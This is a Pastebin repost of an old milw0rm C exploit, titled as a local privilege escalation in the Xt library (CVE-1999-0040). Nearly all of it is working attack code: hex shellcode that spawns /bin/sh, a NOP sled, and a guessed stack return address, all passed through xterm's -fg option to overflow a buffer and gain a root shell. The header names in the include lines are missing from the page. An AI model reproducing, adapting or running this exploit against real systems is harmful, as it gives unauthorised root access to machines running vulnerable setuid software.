Advertisement
FlyFar

Xt Library - Local Privilege Escalation - CVE-1999-0040

Feb 25th, 2024
932
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.37 KB | Cybersecurity | 0 0
  1. #include
  2. #include
  3. #include
  4.  
  5. #define DEFAULT_OFFSET          0
  6. #define BUFFER_SIZE             1491
  7.  
  8. long get_esp(void)
  9. {
  10.    __asm__("movl %esp,%eax\n");
  11. }
  12.  
  13. main(int argc, char **argv)
  14. {
  15.    char *buff = NULL;
  16.    unsigned long *addr_ptr = NULL;
  17.    char *ptr = NULL;
  18.  
  19.    char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
  20.    "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
  21.    "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
  22. "\xeb\x18"
  23.    "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
  24.    "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
  25.  
  26.    int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
  27.  
  28.    if(argc>1)
  29.         ofs=atoi(argv[1]);
  30.    if(argc>2)
  31.         bs=atoi(argv[2]);
  32.    printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
  33.         ofs, get_esp()+ofs, bs);
  34.  
  35.    buff = malloc(4096);
  36.    if(!buff)
  37.    {
  38.       printf("can't allocate memory\n");
  39.       exit(0);
  40.    }
  41.    ptr = buff;
  42.    memset(ptr, 0x90, bs-strlen(execshell));
  43.    ptr += bs-strlen(execshell);
  44.    for(i=0;i < strlen(execshell);i++)
  45.       *(ptr++) = execshell[i];
  46.    addr_ptr = (long *)ptr;
  47.    for(i=0;i < (8/4);i++)
  48.       *(addr_ptr++) = get_esp() + ofs;
  49.    ptr = (char *)addr_ptr;
  50.    *ptr = 0;
  51.    execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
  52. }
  53.  
  54.  
  55. // milw0rm.com [1996-08-24]
  56.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement